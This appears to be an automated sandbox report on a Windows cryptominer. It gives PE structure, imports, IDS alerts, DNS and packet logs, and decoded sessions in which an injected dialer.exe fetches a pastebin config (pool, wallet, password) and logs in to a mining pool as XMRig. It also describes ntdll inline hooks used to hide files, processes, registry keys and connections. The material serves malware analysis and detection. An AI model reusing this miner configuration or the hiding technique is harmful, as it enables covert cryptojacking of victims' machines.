IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb410 | 0x138 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xe690 | 0x178 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9a26 | 0x9c00 | a09ceffdcbbefa0748f83151ae976101 | False | 0.4896083733974359 | data | 6.123705642740087 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xb000 | 0x3cc8 | 0x3e00 | c90ead9b71877dbcd6070f00f8d87db4 | False | 0.5096396169354839 | data | 4.660252854018388 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xf000 | 0x530e48 | 0x52e200 | 0e89761bc0fe80b2684687e92d00b3f5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x540000 | 0x1a4 | 0x200 | f5877d18c8075c8f97b7ee916aa91eef | False | 0.525390625 | data | 3.362838094708458 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.00cfg | 0x541000 | 0x10 | 0x200 | b18c7380298e104adf73576fa46bccc1 | False | 0.04296875 | data | 0.15127132530476972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x542000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x543000 | 0x350 | 0x400 | a5ea00b82ddb864dd7e907200b12fbc7 | False | 0.3642578125 | data | 2.8181232842112682 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x544000 | 0x78 | 0x200 | 605bd4c1917d91de7185a066a49c6d83 | False | 0.23046875 | data | 1.421534345329436 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x543060 | 0x2f0 | SysEx File - ID | English | United States | 0.449468085106383
DLL | Import
msvcrt.dll | __C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _time64, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, rand, signal, srand, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
KERNEL32.dll | DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-18T23:09:19.985310+0200 | 2036289 | ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) | 2 | 192.168.2.4 | 53440 | 1.1.1.1 | 53 | UDP
2024-10-18T23:09:21.281682+0200 | 2826930 | ETPRO COINMINER XMR CoinMiner Usage | 2 | 192.168.2.4 | 49736 | 142.202.242.43 | 443 | TCP
2024-10-18T23:09:21.900075+0200 | 2054247 | ET MALWARE SilentCryptoMiner Agent Config Inbound | 1 | 104.20.4.235 | 443 | 192.168.2.4 | 49735 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 18, 2024 23:09:20.067085981 CEST | 49734 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:09:20.067127943 CEST | 443 | 49734 | 142.202.242.43 | 192.168.2.4
Oct 18, 2024 23:09:20.067214012 CEST | 49734 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:09:20.067629099 CEST | 49734 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:09:20.067643881 CEST | 443 | 49734 | 142.202.242.43 | 192.168.2.4
Oct 18, 2024 23:09:20.637411118 CEST | 49735 | 443 | 192.168.2.4 | 104.20.4.235
Oct 18, 2024 23:09:20.637506008 CEST | 443 | 49735 | 104.20.4.235 | 192.168.2.4
Oct 18, 2024 23:09:20.637595892 CEST | 49735 | 443 | 192.168.2.4 | 104.20.4.235
Oct 18, 2024 23:09:20.661993980 CEST | 49735 | 443 | 192.168.2.4 | 104.20.4.235
Oct 18, 2024 23:09:20.662029028 CEST | 443 | 49735 | 104.20.4.235 | 192.168.2.4
Oct 18, 2024 23:09:20.716703892 CEST | 443 | 49734 | 142.202.242.43 | 192.168.2.4
Oct 18, 2024 23:09:20.807923079 CEST | 49734 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:09:21.274916887 CEST | 443 | 49735 | 104.20.4.235 | 192.168.2.4
Oct 18, 2024 23:09:21.276652098 CEST | 49735 | 443 | 192.168.2.4 | 104.20.4.235
Oct 18, 2024 23:09:21.276710987 CEST | 443 | 49735 | 104.20.4.235 | 192.168.2.4
Oct 18, 2024 23:09:21.278826952 CEST | 443 | 49735 | 104.20.4.235 | 192.168.2.4
Oct 18, 2024 23:09:21.278997898 CEST | 49735 | 443 | 192.168.2.4 | 104.20.4.235
Oct 18, 2024 23:09:21.281270981 CEST | 49735 | 443 | 192.168.2.4 | 104.20.4.235
Oct 18, 2024 23:09:21.281384945 CEST | 443 | 49735 | 104.20.4.235 | 192.168.2.4
Oct 18, 2024 23:09:21.281549931 CEST | 49735 | 443 | 192.168.2.4 | 104.20.4.235
Oct 18, 2024 23:09:21.281568050 CEST | 443 | 49735 | 104.20.4.235 | 192.168.2.4
Oct 18, 2024 23:09:21.464221001 CEST | 49735 | 443 | 192.168.2.4 | 104.20.4.235
Oct 18, 2024 23:09:21.899538994 CEST | 443 | 49735 | 104.20.4.235 | 192.168.2.4
Oct 18, 2024 23:09:21.899801016 CEST | 443 | 49735 | 104.20.4.235 | 192.168.2.4
Oct 18, 2024 23:09:21.899885893 CEST | 49735 | 443 | 192.168.2.4 | 104.20.4.235
Oct 18, 2024 23:09:21.902266026 CEST | 49735 | 443 | 192.168.2.4 | 104.20.4.235
Oct 18, 2024 23:09:21.902287006 CEST | 443 | 49735 | 104.20.4.235 | 192.168.2.4
Oct 18, 2024 23:09:21.927555084 CEST | 49734 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:09:21.927586079 CEST | 49734 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:09:21.927860975 CEST | 49736 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:09:21.927897930 CEST | 443 | 49736 | 142.202.242.43 | 192.168.2.4
Oct 18, 2024 23:09:21.928039074 CEST | 49736 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:09:22.146163940 CEST | 49736 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:09:22.146193027 CEST | 443 | 49736 | 142.202.242.43 | 192.168.2.4
Oct 18, 2024 23:09:22.802798033 CEST | 443 | 49736 | 142.202.242.43 | 192.168.2.4
Oct 18, 2024 23:09:22.838592052 CEST | 49736 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:09:22.838618994 CEST | 443 | 49736 | 142.202.242.43 | 192.168.2.4
Oct 18, 2024 23:09:22.842504025 CEST | 443 | 49736 | 142.202.242.43 | 192.168.2.4
Oct 18, 2024 23:09:22.842595100 CEST | 49736 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:09:22.843755007 CEST | 49736 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:09:22.843962908 CEST | 443 | 49736 | 142.202.242.43 | 192.168.2.4
Oct 18, 2024 23:09:22.917280912 CEST | 49736 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:09:22.917299986 CEST | 443 | 49736 | 142.202.242.43 | 192.168.2.4
Oct 18, 2024 23:09:23.104809046 CEST | 49736 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:09:23.104866028 CEST | 443 | 49736 | 142.202.242.43 | 192.168.2.4
Oct 18, 2024 23:09:23.214195967 CEST | 49736 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:09:35.290678978 CEST | 443 | 49736 | 142.202.242.43 | 192.168.2.4
Oct 18, 2024 23:09:35.401876926 CEST | 49736 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:09:57.350405931 CEST | 443 | 49736 | 142.202.242.43 | 192.168.2.4
Oct 18, 2024 23:09:57.401884079 CEST | 49736 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:10:19.300110102 CEST | 443 | 49736 | 142.202.242.43 | 192.168.2.4
Oct 18, 2024 23:10:19.417439938 CEST | 49736 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:10:41.300472975 CEST | 443 | 49736 | 142.202.242.43 | 192.168.2.4
Oct 18, 2024 23:10:41.417684078 CEST | 49736 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:11:01.091958046 CEST | 443 | 49736 | 142.202.242.43 | 192.168.2.4
Oct 18, 2024 23:11:01.208410978 CEST | 49736 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:11:03.313231945 CEST | 443 | 49736 | 142.202.242.43 | 192.168.2.4
Oct 18, 2024 23:11:03.417546034 CEST | 49736 | 443 | 192.168.2.4 | 142.202.242.43
Oct 18, 2024 23:11:25.317512989 CEST | 443 | 49736 | 142.202.242.43 | 192.168.2.4
Oct 18, 2024 23:11:25.402070045 CEST | 49736 | 443 | 192.168.2.4 | 142.202.242.43
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 18, 2024 23:09:19.985310078 CEST | 53440 | 53 | 192.168.2.4 | 1.1.1.1
Oct 18, 2024 23:09:20.004615068 CEST | 53 | 53440 | 1.1.1.1 | 192.168.2.4
Oct 18, 2024 23:09:20.627815008 CEST | 55846 | 53 | 192.168.2.4 | 1.1.1.1
Oct 18, 2024 23:09:20.635647058 CEST | 53 | 55846 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 18, 2024 23:09:19.985310078 CEST | 192.168.2.4 | 1.1.1.1 | 0x284e | Standard query (0) | pool.hashvault.pro | A (IP address) | IN (0x0001) | false
Oct 18, 2024 23:09:20.627815008 CEST | 192.168.2.4 | 1.1.1.1 | 0x8104 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 18, 2024 23:09:20.004615068 CEST | 1.1.1.1 | 192.168.2.4 | 0x284e | No error (0) | pool.hashvault.pro | | 142.202.242.43 | A (IP address) | IN (0x0001) | false
Oct 18, 2024 23:09:20.004615068 CEST | 1.1.1.1 | 192.168.2.4 | 0x284e | No error (0) | pool.hashvault.pro | | 142.202.242.45 | A (IP address) | IN (0x0001) | false
Oct 18, 2024 23:09:20.635647058 CEST | 1.1.1.1 | 192.168.2.4 | 0x8104 | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Oct 18, 2024 23:09:20.635647058 CEST | 1.1.1.1 | 192.168.2.4 | 0x8104 | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Oct 18, 2024 23:09:20.635647058 CEST | 1.1.1.1 | 192.168.2.4 | 0x8104 | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
                                                      • pastebin.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 104.20.4.235 | 443 | 7784 | C:\Windows\System32\dialer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-18 21:09:21 UTC | 114 | OUT | GET /raw/f2EfCEn0 HTTP/1.1
    Accept: */*
    Connection: close
    Host: pastebin.com
    User-Agent: cpp-httplib/0.12.6
2024-10-18 21:09:21 UTC | 388 | IN | HTTP/1.1 200 OK
    Date: Fri, 18 Oct 2024 21:09:21 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    cache-control: public, max-age=1801
    CF-Cache-Status: MISS
    Last-Modified: Fri, 18 Oct 2024 21:09:21 GMT
    Server: cloudflare
    CF-RAY: 8d4b82487e7a2e64-DFW
2024-10-18 21:09:21 UTC | 487 | IN | Data Raw: 31 65 30 0d 0a 7b 0d 0a 20 20 20 20 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 20 20 20 20 22 70 6f 6f 6c 22 3a 20 22 70 6f 6f 6c 2e 68 61 73 68 76 61 75 6c 74 2e 70 72 6f 22 2c 0d 0a 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0d 0a 20 20 20 20 22 77 61 6c 6c 65 74 22 3a 20 22 38 42 74 50 37 6a 46 6d 32 47 4b 4e 61 36 42 51 4b 6e 45 62 59 74 4d 57 5a 74 65 4a 69 35 4d 6b 64 34 45 6e 31 57 6f 4a 6d 68 4a 74 68 74 5a 73 42 68 43 39 72 79 39 44 78 45 6a 6a 72 74 67 36 71 4e 37 71 4d 32 32 73 6f 6e 69 69 5a 64 32 6d 61 31 70 77 69 75 32 4c 37 50 78 77 72 6d 7a 22 2c 0d 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 22 77 6f 72 6b 65 72 22 2c 0d 0a 20 20 20 20 22 6e 69 63 65 68 61 73 68 22 3a 20 66 61 6c 73 65 2c 0d 0a 20 20 20 20 22 73 73 6c
    Data Ascii: 1e0{ "algo": "rx/0", "pool": "pool.hashvault.pro", "port": 443, "wallet": "8BtP7jFm2GKNa6BQKnEbYtMWZteJi5Mkd4En1WoJmhJthtZsBhC9ry9DxEjjrtg6qN7qM22soniiZd2ma1pwiu2L7Pxwrmz", "password": "worker", "nicehash": false, "ssl
2024-10-18 21:09:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49736 | 142.202.242.43 | 443 | 7784 | C:\Windows\System32\dialer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-18 21:09:22 UTC | 597 | OUT | Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 38 42 74 50 37 6a 46 6d 32 47 4b 4e 61 36 42 51 4b 6e 45 62 59 74 4d 57 5a 74 65 4a 69 35 4d 6b 64 34 45 6e 31 57 6f 4a 6d 68 4a 74 68 74 5a 73 42 68 43 39 72 79 39 44 78 45 6a 6a 72 74 67 36 71 4e 37 71 4d 32 32 73 6f 6e 69 69 5a 64 32 6d 61 31 70 77 69 75 32 4c 37 50 78 77 72 6d 7a 22 2c 22 70 61 73 73 22 3a 22 77 6f 72 6b 65 72 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 39 2e 33 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 32 32 22 2c 22 72 69 67 69 64
    Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"8BtP7jFm2GKNa6BQKnEbYtMWZteJi5Mkd4En1WoJmhJthtZsBhC9ry9DxEjjrtg6qN7qM22soniiZd2ma1pwiu2L7Pxwrmz","pass":"worker","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022","rigid
2024-10-18 21:09:22 UTC | 732 | IN | Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 38 64 38 66 35 30 35 65 2d 38 39 30 35 2d 34 33 65 38 2d 39 66 65 66 2d 35 63 32 62 33 61 32 34 36 63 35 66 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 39 39 63 63 62 62 38 30 36 37 64 33 31 32 34 30 37 65 37 39 36 33 62 33 65 37 35 38 30 63 65 34 34 35 65 30 63 31 34 64 62 66 61 33 30 32 34 37 36 37 61 38 35 66 65 37 39 35 36 61 65 65 30 32 62 63 39 37 36 61 39 30 66 30 30 30 30 30 30 30 30 65 38 32 66 65 62 39 38 63 66 35 36 32 38 35 31 38 65 37 39 33 61 31 36 31 63 30 34 35 33 66 30 35 34 61 66 35 38 36 38 37 61 30 38 62 62 64 63 33 34 32 31 61 66 63 34 62 61 39 38 65 61 35
    Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"8d8f505e-8905-43e8-9fef-5c2b3a246c5f","job":{"blob":"1010f99ccbb8067d312407e7963b3e7580ce445e0c14dbfa3024767a85fe7956aee02bc976a90f00000000e82feb98cf5628518e793a161c0453f054af58687a08bbdc3421afc4ba98ea5
2024-10-18 21:09:35 UTC | 471 | IN | Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 66 39 64 63 62 62 38 30 36 37 64 33 31 32 34 30 37 65 37 39 36 33 62 33 65 37 35 38 30 63 65 34 34 35 65 30 63 31 34 64 62 66 61 33 30 32 34 37 36 37 61 38 35 66 65 37 39 35 36 61 65 65 30 32 62 63 39 37 36 61 39 30 66 30 30 30 30 30 30 30 30 36 32 35 63 66 30 63 34 35 30 38 31 39 38 33 64 38 63 36 35 66 64 64 30 37 31 38 34 35 31 36 39 36 32 37 38 65 35 38 30 36 34 38 39 33 65 35 32 63 36 66 35 30 38 30 35 35 36 32 63 33 30 36 66 31 64 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 63 39 61 64 34 33 35 33 2d 39 38 34 30 2d 34 30 61 62 2d 62 36 37 37 2d 38 30 63 62 30 64 34 64 31 65 63 30 22 2c 22 74 61
    Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10108f9dcbb8067d312407e7963b3e7580ce445e0c14dbfa3024767a85fe7956aee02bc976a90f00000000625cf0c45081983d8c65fdd0718451696278e58064893e52c6f50805562c306f1d","job_id":"c9ad4353-9840-40ab-b677-80cb0d4d1ec0","ta
2024-10-18 21:09:57 UTC | 471 | IN | Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 35 39 64 63 62 62 38 30 36 37 64 33 31 32 34 30 37 65 37 39 36 33 62 33 65 37 35 38 30 63 65 34 34 35 65 30 63 31 34 64 62 66 61 33 30 32 34 37 36 37 61 38 35 66 65 37 39 35 36 61 65 65 30 32 62 63 39 37 36 61 39 30 66 30 30 30 30 30 30 30 30 35 30 38 35 34 39 39 62 38 31 36 64 63 37 61 65 36 35 30 65 30 37 61 33 39 33 36 31 35 30 38 34 30 61 64 61 36 39 36 65 30 31 38 62 35 39 31 32 61 66 31 36 66 61 34 38 61 39 65 35 31 36 64 33 32 34 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 31 30 62 30 61 61 39 39 2d 62 36 65 62 2d 34 30 64 63 2d 61 37 30 65 2d 34 35 38 66 64 65 32 66 36 35 33 66 22 2c 22 74 61
    Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a59dcbb8067d312407e7963b3e7580ce445e0c14dbfa3024767a85fe7956aee02bc976a90f000000005085499b816dc7ae650e07a3936150840ada696e018b5912af16fa48a9e516d324","job_id":"10b0aa99-b6eb-40dc-a70e-458fde2f653f","ta
2024-10-18 21:10:19 UTC | 471 | IN | Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 62 39 64 63 62 62 38 30 36 37 64 33 31 32 34 30 37 65 37 39 36 33 62 33 65 37 35 38 30 63 65 34 34 35 65 30 63 31 34 64 62 66 61 33 30 32 34 37 36 37 61 38 35 66 65 37 39 35 36 61 65 65 30 32 62 63 39 37 36 61 39 30 66 30 30 30 30 30 30 30 30 32 32 61 34 64 34 62 31 64 30 39 33 34 66 33 38 66 36 34 35 38 35 37 34 32 62 39 35 38 34 39 37 34 34 35 30 30 32 63 64 33 66 62 31 32 65 31 33 36 30 34 33 34 37 30 34 62 64 33 30 37 34 35 31 32 38 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 30 34 33 30 32 66 31 30 2d 63 34 63 39 2d 34 62 39 66 2d 61 65 35 39 2d 66 33 65 37 61 31 38 32 38 30 65 30 22 2c 22 74 61
    Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010bb9dcbb8067d312407e7963b3e7580ce445e0c14dbfa3024767a85fe7956aee02bc976a90f0000000022a4d4b1d0934f38f64585742b958497445002cd3fb12e1360434704bd30745128","job_id":"04302f10-c4c9-4b9f-ae59-f3e7a18280e0","ta
2024-10-18 21:10:41 UTC | 471 | IN | Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 31 39 64 63 62 62 38 30 36 37 64 33 31 32 34 30 37 65 37 39 36 33 62 33 65 37 35 38 30 63 65 34 34 35 65 30 63 31 34 64 62 66 61 33 30 32 34 37 36 37 61 38 35 66 65 37 39 35 36 61 65 65 30 32 62 63 39 37 36 61 39 30 66 30 30 30 30 30 30 30 30 63 34 37 61 66 35 31 38 31 63 33 37 35 39 35 62 64 31 63 63 34 37 63 35 65 66 38 32 61 63 64 30 62 31 30 31 62 62 38 34 35 34 35 61 33 31 63 31 36 39 36 35 37 30 62 36 31 30 35 64 66 65 34 38 32 63 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 34 62 66 66 33 32 63 62 2d 39 65 35 31 2d 34 64 62 32 2d 62 61 31 64 2d 30 62 32 30 30 61 61 30 31 31 61 62 22 2c 22 74 61
    Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010d19dcbb8067d312407e7963b3e7580ce445e0c14dbfa3024767a85fe7956aee02bc976a90f00000000c47af5181c37595bd1cc47c5ef82acd0b101bb84545a31c1696570b6105dfe482c","job_id":"4bff32cb-9e51-4db2-ba1d-0b200aa011ab","ta
2024-10-18 21:11:01 UTC | 471 | IN | Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 31 39 64 63 62 62 38 30 36 37 64 33 31 32 34 30 37 65 37 39 36 33 62 33 65 37 35 38 30 63 65 34 34 35 65 30 63 31 34 64 62 66 61 33 30 32 34 37 36 37 61 38 35 66 65 37 39 35 36 61 65 65 30 32 62 63 39 37 36 61 39 30 66 30 30 30 30 30 30 30 30 64 63 30 61 64 63 39 36 61 31 39 66 35 38 65 36 38 64 63 36 38 32 63 36 62 31 37 39 35 36 66 64 30 33 30 33 64 61 35 37 37 32 65 34 66 62 32 38 34 30 34 36 35 34 65 66 65 38 33 62 35 62 32 65 32 63 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 35 61 66 35 30 31 34 33 2d 37 33 65 36 2d 34 33 66 34 2d 62 61 39 30 2d 65 36 30 35 36 38 34 36 66 30 35 32 22 2c 22 74 61
    Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010d19dcbb8067d312407e7963b3e7580ce445e0c14dbfa3024767a85fe7956aee02bc976a90f00000000dc0adc96a19f58e68dc682c6b17956fd0303da5772e4fb28404654efe83b5b2e2c","job_id":"5af50143-73e6-43f4-ba90-e6056846f052","ta
2024-10-18 21:11:03 UTC | 471 | IN | Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 37 39 64 63 62 62 38 30 36 37 64 33 31 32 34 30 37 65 37 39 36 33 62 33 65 37 35 38 30 63 65 34 34 35 65 30 63 31 34 64 62 66 61 33 30 32 34 37 36 37 61 38 35 66 65 37 39 35 36 61 65 65 30 32 62 63 39 37 36 61 39 30 66 30 30 30 30 30 30 30 30 31 30 32 66 32 38 64 36 32 64 35 38 38 64 30 63 34 65 39 32 66 37 35 64 33 63 65 34 34 62 33 61 36 62 37 37 35 61 63 38 33 32 32 31 34 31 65 62 39 33 35 63 65 31 64 34 65 35 35 37 39 32 38 33 33 31 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 36 33 36 33 32 32 65 63 2d 66 66 32 31 2d 34 35 36 33 2d 39 39 63 37 2d 32 33 37 63 62 39 35 64 35 38 38 34 22 2c 22 74 61
    Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e79dcbb8067d312407e7963b3e7580ce445e0c14dbfa3024767a85fe7956aee02bc976a90f00000000102f28d62d588d0c4e92f75d3ce44b3a6b775ac8322141eb935ce1d4e557928331","job_id":"636322ec-ff21-4563-99c7-237cb95d5884","ta
2024-10-18 21:11:25 UTC | 471 | IN | Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 64 39 64 63 62 62 38 30 36 37 64 33 31 32 34 30 37 65 37 39 36 33 62 33 65 37 35 38 30 63 65 34 34 35 65 30 63 31 34 64 62 66 61 33 30 32 34 37 36 37 61 38 35 66 65 37 39 35 36 61 65 65 30 32 62 63 39 37 36 61 39 30 66 30 30 30 30 30 30 30 30 31 32 31 31 30 66 64 36 37 64 65 34 64 63 32 36 31 61 37 36 62 37 37 38 31 39 61 31 66 35 37 30 36 38 34 66 35 63 33 36 62 36 30 64 30 30 39 30 35 38 64 35 31 33 31 64 66 63 64 31 39 39 66 64 33 35 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 66 66 32 61 30 65 39 32 2d 33 64 37 31 2d 34 37 61 65 2d 39 39 36 61 2d 62 38 38 30 38 32 39 61 63 32 63 61 22 2c 22 74 61
    Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010fd9dcbb8067d312407e7963b3e7580ce445e0c14dbfa3024767a85fe7956aee02bc976a90f0000000012110fd67de4dc261a76b77819a1f570684f5c36b60d009058d5131dfcd199fd35","job_id":"ff2a0e92-3d71-47ae-996a-b880829ac2ca","ta


Code Manipulations

User-mode inline hooks found in explorer.exe and winlogon.exe. Every hooked ntdll export now begins with 0xE9, the opcode of an x86/x64 JMP rel32: the first five bytes of the system-call stub were overwritten with a jump into the injected code. Nt*/Zw* pairs (and RtlGetNativeSystemInformation, an alias of NtQuerySystemInformation) show identical bytes because in user-mode ntdll.dll they are different names for the same stub. The hooked set covers the usual user-mode rootkit goals: NtQueryDirectoryFile/NtQueryDirectoryFileEx (hide files and directories), NtQuerySystemInformation (hide processes), NtEnumerateKey/NtEnumerateValueKey (hide registry keys), NtDeviceIoControlFile (the call underneath NSI/TCP-table enumeration, the usual place to hide network connections) and NtResumeThread (re-hook every child process before its first instruction runs). The purposes given for the last two are the conventional use of those hooks; this analysis does not confirm them.

Function Name                    Hook Type   Active in Processes
ZwEnumerateKey                   INLINE      explorer.exe, winlogon.exe
NtQuerySystemInformation         INLINE      explorer.exe, winlogon.exe
ZwResumeThread                   INLINE      explorer.exe, winlogon.exe
NtDeviceIoControlFile            INLINE      explorer.exe, winlogon.exe
ZwDeviceIoControlFile            INLINE      explorer.exe, winlogon.exe
NtEnumerateKey                   INLINE      explorer.exe, winlogon.exe
NtQueryDirectoryFile             INLINE      explorer.exe, winlogon.exe
ZwEnumerateValueKey              INLINE      explorer.exe, winlogon.exe
ZwQuerySystemInformation         INLINE      explorer.exe, winlogon.exe
NtResumeThread                   INLINE      explorer.exe, winlogon.exe
